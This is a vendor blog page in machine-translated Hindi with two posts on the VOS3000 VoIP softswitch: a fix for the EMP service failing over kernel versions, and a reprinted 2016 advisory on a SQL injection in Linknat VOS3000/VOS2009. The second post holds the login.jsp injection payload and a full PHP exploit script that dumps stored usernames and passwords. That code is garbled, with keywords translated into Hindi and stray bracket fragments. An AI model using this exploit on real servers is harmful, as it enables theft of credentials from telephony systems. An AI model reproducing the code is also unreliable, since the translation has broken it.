Skip to content
  • Home
  • Cheapest VOS3000 Server Rent, VOS3000 Best Trusted Vendor
  • VOS3000 Softswitch
Search
Close

VOS3000

MULTAHOST Blog for VOS3000 Troubleshoot

Category: Uncategorized

EMP शुरू VOS3000 सर्वर एसएसएच में विफल रहा है, कैसे हल करने के लिए?

June 7, 2019 king

नमस्ते सभी,

# सेवा empd शुर
ू कुन्शी एम्प सेवा शुरू: [FAILED]

आप में से कई चेहरा मुद्दा EMP शुरू EMP के लिए आदेश देने के बाद विफल रहा है, वहां कई कारण हैं, मैं अब एक प्रमुख मुद्दे का वर्णन करेंगे । VOS3000 Emp लिनक्स के सभी गिरी संस्करणों का समर्थन नहीं करते हैं। ज्यादातर VOS3000 के लिए उपयोग किया जाता है सेंटोस, सेंटोस 5.11 अब सेंटोस द्वारा समर्थित नहीं है, इसलिए इसे किसी भी डेटासेंटर से प्राप्त करना मुश्किल है लेकिन संभव है। उस मामले में रेपो फाइल को ठीक करने की जरूरत है। इसके अलावा सेंटोस 6.10 या सेंटोस 7 ने भी VOS3000 के कई संस्करणों का समर्थन नहीं किया। मुख्य रूप से गिरी मुद्दे के कारण शुरू नहीं किया गया। एम्प स्टार्ट के बिना आप एमबीएक्स शुरू नहीं कर सकते हैं। उस मामले में आप गिरी का समर्थन करने के लिए ढाल या एक समर्थित करने के लिए गिरी को अपग्रेड करने की जरूरत है । मैं संलग्न फ़ाइल में यहां emp समर्थित गिरी सूची साझा कर रहा हूं । तो आप आसानी से अपग्रेड और डाउनग्रेड कर सकते हैं।

अपग्रेड या डाउनग्रेड गिरी वर्जन के लिए आप गूगल में सर्च कर सकते हैं, इसके लिए कई आसान मैनुअल हैं।

एम्प समर्थित गिरी सूची

कुछ महत्वपूर्ण आदेश आप vos3000 के साथ गिरी मुद्दे के लिए पता करने की आवश्यकता है।

स्थापित सॉफ़्टवेयर को सूचीबद्ध करने के लिए आपको मानक आरपीएम कमांड का उपयोग करना होगा। शेल प्रॉम्प्ट पर निम्नलिखित कमांड टाइप करें:


$ rpm-qa kernel
Output: गिरी-2.6.18-4.1.15.el5 गिरी-2.6.18-8.1.14.el5 k ernel-2.6.18-8.1.10.el5

यदि आपको अधिक मदद की जरूरत है तो सिर्फ मुझे व्हाट्सएप करें: +8801911119966

कैसे VOS3000 SQL इंजेक्शन स्क्रिप्ट द्वारा काट दिया हो, हैकिंग को रोकने के!

June 4, 2019November 22, 2020 king

Linknat VOS2009/VOS3000 SQL इंजेक्शन


से: ओसामा खालिद <osama ()="" codinghazard="" com="">त
िथि: Thu, 19 मई २०१६ 16:52:54 + ०५००</osama>


एक एसक्यूएल इंजेक्शन Linknat VOS3000/VOS2009, एक लोकप्रिय वीओआईपी में पाया गया था
सॉफ्टस्विच, जो दूरदराज के हमलावरों को पहुंच प्राप्त करने की अनुमति दे सकता है
सादे पाठ में संग्रहीत साख।

आवेदन: लिंकनट VOS3000/VOS2009
प्रभावित संस्करण: 2.1.1.5, 2.1.1.8, 2.1.2.0
विक्रेता यूआरएल: http://www.linknat.com/
बग: एसक्यूली (डीबीए विशेषाधिकारों के साथ)
प्रकार: रिमोट
रिज़ॉल्यूशन: फिक्स्ड, 2.1.2.4 या 2.1.6.0 स्वच्छ संस्करण में अपग्रेड करें
संदर्भ: वूयून-2015-145458 -
http://www.wooyun.org/bugs/wooyun-2010-0145458

SQLi रिपोर्ट समय आधारित अंधा है । चूंकि यह एक इन-बैंड SQLi नहीं है,
परिणाम उसी के दौरान स्वागत के उत्पादन से इकट्ठा किया जा सकता है.jsp
सत्र।

(पहला अनुरोध)

पद http://target/eng/login.jsp
परम लॉगइनटाइप =1
        नाम = ' संघ का चयन 1,2,@@version, 'नमस्ते', 5,6#
        पास =' या ''='

(इसी सत्र के दौरान दूसरा अनुरोध)

http://target/eng/welcome.jsp जाओ
परिणाम 0.' संघ का चयन
1,2,@@version, 'hello', 5,6 #.1.5.0.51a-community.hello.0.00.0.00.

<?php
#
# Linknat [ EXPLOIT CODE ]VOS2009/VOS3000 SQLi exploit
#
# DISCLAIMER: The exploit is to be used for educational purposes only
#             The author would not be responsible for any misuse
#
# AUTHOR:     Osama Khalid
# WEBSITE:    http://www.codinghazard.com/
# DATE:       19/05/2016
# REF:        http://www.wooyun.org/bugs/wooyun-2010-0145458

if ($argc  < 2) {
    banner();
    usage();
    exit;
}

$host         = $argv;
$column_one   = isset[1]($argv) ? $argv : "loginname"[2];
$column_[2]two   = isset($argv) ? $argv : "password";
[3]$table   [3]     = isset($argv) ? $argv : "e_user";
$o[4]ther      [4]  = isset($argv) ? $argv : "";

function[5] banner()[5] {
    echo "########################################n";
    echo "#                                      #n";
    echo "# Linknat VOS3000/VOS2009 SQLi exploit #n";
    echo "#                                      #n";
    echo "#             Osama Khalid             #n";
    echo "########### codinghazard.com ###########n";
}

function usage() {
    echo "n";
    echo "php vos3000.php n";
    echo "php vos3000.ph[HOST]p 127.0.0.1n";
    echo "php vos3000.php     n";
    echo "php vos3000[HOST].[COL1]p[COL2]h[TABLE]p[OTHER SQL] 127.0.0.1 table_schema table_name
information_schema.tables "where table_schema = 'mysql'"
n";
}

function curl($url, $post = array(), $cookies = null, $header = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($curl, CURLOPT_HEADER, $header);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if ($cookies != null)
        curl_setopt($curl, CURLOPT_COOKIE, $cookies);
    if (count($post) > 0) {
        फोरच ($post $key = > $value)
            $post_आइटम = $key । '=' . यूरेनकोड ($value);
        []$post_स्ट्रिंग = फटना ('&', $post_आइटम);
        curl_setopt ($curl, CURLOPT_POST, 1);
        curl_setopt ($curl, CURLOPT_POSTFIELDS, $post_स्ट्रिंग);
    }
    $data = curl_exec ($curl);
    curl_close ($curl);
    $data लौटें;
}

फंक्शन क्वेरी ($host, $query) {
    $data = कर्ल ("http://$host/eng/login.jsp";, सरणी (
            "लॉगिनटाइप" = > 1,
            "नाम" = > "संघ" । $query । "#",
            "पास" = > "' या '='"
        ), अशक्त, सच है);
    preg_match_all ('। सेट-कुकी: (.*);..यू', $data, $matches);
    $cookies = फटना ('; ', $matches);
    $data = कर्ल ("http://$host/eng/welcome.j[1]sp";, सरणी (), $cookies, झूठी);
    $parts = विस्फोट (".., ट्रिम ($data));

यदि (गिनती ($parts) < 7)
        return false;

    return array($parts, $parts);
}

function ascii_table($data) {
    $[3]keys = a[4]rray_keys(end($data));
    $wid = array_map('strlen', $keys);
    foreach($data as $row) {
        foreach(array_values($row) as $k => $v)
            $wid = अधिकतम ($wid, स्ट्रेन ($v));
    }
    फोरच ($k [$k]= > $v) के [$k]रूप में $wid {
        $fmt = "%-{$v}s";
        $sep = str_repea[$k]t ('-', $v);
    }
    $fmt[$k] = '। ' . फटना (' । ', $fmt) । ' |';
    $sep = '+-' । फटना ('-+-', $sep) । '-+';
    $buf = सरणी ($sep, वेस्प्रिंट ($fmt, $keys), $sep);
    फोरच ($row के रूप में $data) {
        $buf = vsprintf ($fmt, $row);
        $[]buf = $sep;
    }
    वापसी फटना ("n[]", $buf);
}

बैनर ();
गूंज "n";
गूंज "लक्ष्य: $host  n";
गूंज "कॉलम #1: $column_onen";
गूंज "कॉलम #2: $column_दो n";
गूंज "तालिका: $table n";
गूंज "अन्य: $other n";
गूंज "n";

$results = सरणी ();
$count_result = क्वेरी ($host, "1,2,काउंट (*), 4,5,6 से $table
$other");
यदि ($count_result) {
    $count = intval ($count_result);
    गूंज "पंक्तियों $count पाया...n";

के लिए ($i = [0]0; $i<$count; $i++)="" {="" $q="SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table
$other LIMIT " .="" $i="" .="" ",1";="" $result="query($host," $q);="" if="" ($result)="" {="" echo="" "r"="" .="" ($i+1)="" .="" "]t"="" .="" $column_one="" .="" "=" .
hex2bin($result) . " ,="" "="" .="" $column_two="" .=[0]"" "=" . hex2bin($result) .
" n";="" }="" else=[1]"" {="" echo="" "error="" retrieving="" row="" "="" .="" ($i+1)="" .="" "n";="" }="" $results="array($column_on[]e" ==""> hex2bin ($result), $column_two
[0]=> हेक्स2बिन ($result));
    }

य[1]दि (गिनती ($results) > 0) {
        गूंज "nn" । ascii_table ($results) । "n";
    }
}अन्य {
    गूंज "त्रुटि पुनः प्राप्त पंक्ति गिनती";
}

?></$count;>

2016 से लोग VOS3000 हैक करने के लिए कुछ वर्ग इंजेक्शन सॉफ्ट माल का उपयोग करते हैं, हमारे पास उस समय से हमारी अपनी सुरक्षा प्रणाली है, हमने अपनी सुरक्षा प्रणाली को अपडेट किया है, अब हमने अपनी सुरक्षा प्रणाली को भी मजबूत किया है, मेरा काम ध्यान वीओआईपी सॉफ्ट-स्विच के लिए सुरक्षा के लिए हमेशा था। अधिकांश समय मैंने मुफ्त सलाह दी या जितना संभव हो उतना मुफ्त जानकारी साझा की। फिर भी बहुत सारी गंदी चीजें चल रही हैं, इसलिए कृपया हमेशा सावधान रहें और अधिक जानें। वरना आप कभी भी अच्छा बिजनेस नहीं कर पाएंगे। अब-एक दिन VOS सर्वर हैक करने के लिए VOS3000 क्लाइंट सॉफ्टवेयर में छिपी स्क्रिप्ट या मैलवेयर का उपयोग कर रहे लोग।

अधिक मदद के लिए मुझे whatsapp में दस्तक: + ८८०१९११११९९६६-मैं सभी तरीकों से मदद करेंगे ।

Posts navigation

Newer Posts

Recent Posts

  • Configuración servidor LRN VOS3000 Reliable parámetros SS_LRN_SERVER_IP PORT
  • Portabilidad numérica LRN VOS3000 Proven consulta de carriers EE.UU.
  • Precisión decimal tarifas VOS3000 Accurate configuración FEE_PRECISTION y HOLD_TIME_PRECISION
  • Códigos respuesta SIP CDR VOS3000 Complete Important referencia de 30+ códigos
  • Reemplazo razón fallida VOS3000 Best Strategic configuración personalizada de errores
  • Detección interrupción RTP VOS3000 Accurate monitoreo de medios en cuatro modos
  • VOS3000 Replace Failed Reason Strategic Custom Error Response Configuration
  • VOS3000 Call Forward Signal Easy Recognition Smart SS_RECOGNIZE_CALL_FORWARD_SIGNAL
  • VOS3000 Remote Ring Back Mode Comprehensive Passthrough 183 180 Configuration
  • VOS3000 Callee Source Header Flexible To Request-Line Selection Important
  • VOS3000 Caller Source Header Selection Complete From Remote-Party-ID Display Important
  • VOS3000 LRN Number Portability Proven US Carrier Lookup Configuration
  • VOS3000 LRN Server Configuration Reliable SS_LRN_SERVER_IP PORT Setup
  • VOS3000 Server End Reasons Definitive Important 25-Code Reference Guide
  • VOS3000 H323 Q850 Cause Codes Comprehensive 60-Plus Code Reference
  • VOS3000 SIP Response Codes CDR Complete 30-Plus Important Code Reference
  • VOS3000 SIP Publish Expire: Essential Gateway Concurrency Guide
  • VOS3000 SIP Send Unregister: Essential Registration Cleanup Easy Guide
  • VOS3000 SIP Display From: Important E164 Caller Configuration
  • VOS3000 SIP Routing Gateway Contact: Essential INVITE Header Guide
  • VOS3000 SIP INVITE Timeout and Gateway Switching: Complete Call Setup Guide
  • VOS3000 SIP Privacy Header: Essential Caller ID Protection Guide
  • VOS3000 SIP Outbound Registration Parameters: Expiry and Retry Delay Easy Guide
  • VOS3000 SIP Call Progress Timeout: Complete Signal Chain Guide
  • VOS3000 SIP Resend Interval: Important Message Retransmission Guide
[email protected]
+8801911119966
Change VOS3000 2.1.9.07 Chinese Client to English Client Easy Step!Change VOS3000 2.1.9.07 Chinese Client to English Client Easy Step!
VOS3000 Softswitch Rent, Installation & Price – Dedicated and Cloud Server SolutionsVOS3000 Softswitch Rent, Installation & Price – Dedicated and Cloud Server Solutions
VOS3000 2.1.8.00 / 2.1.8.05 Complete English Manual Download Free!VOS3000 2.1.8.00 / 2.1.8.05 Complete English Manual Download Free!
VOS3000 软交换系统完整技术指南(安装、服务器、价格与安全) ImportantVOS3000 软交换系统完整技术指南(安装、服务器、价格与安全) Important
Proudly powered by WordPress | Theme: Nucleare by CrestaProject.
Back to top
WhatsApp chat